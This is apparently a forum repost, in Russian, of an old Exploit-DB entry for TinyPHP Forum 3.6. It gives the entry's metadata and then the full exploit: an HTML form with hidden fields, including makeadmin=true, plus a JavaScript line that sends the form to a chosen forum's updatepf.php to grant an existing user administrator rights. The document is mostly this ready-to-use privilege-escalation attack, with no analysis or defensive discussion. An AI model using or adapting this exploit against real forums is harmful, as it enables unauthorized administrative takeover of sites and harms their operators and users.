Exploit TinyPHP Forum 3.6 - 'makeAdmin' Remote Admin Maker

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2114
Проверка EDB
  1. Пройдено
Автор
SIRDARCKCAT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-08-02
HTML:
TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net

<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="[email protected]">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>

<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>

# milw0rm.com [2006-08-02]
 
Источник
www.exploit-db.com

Похожие темы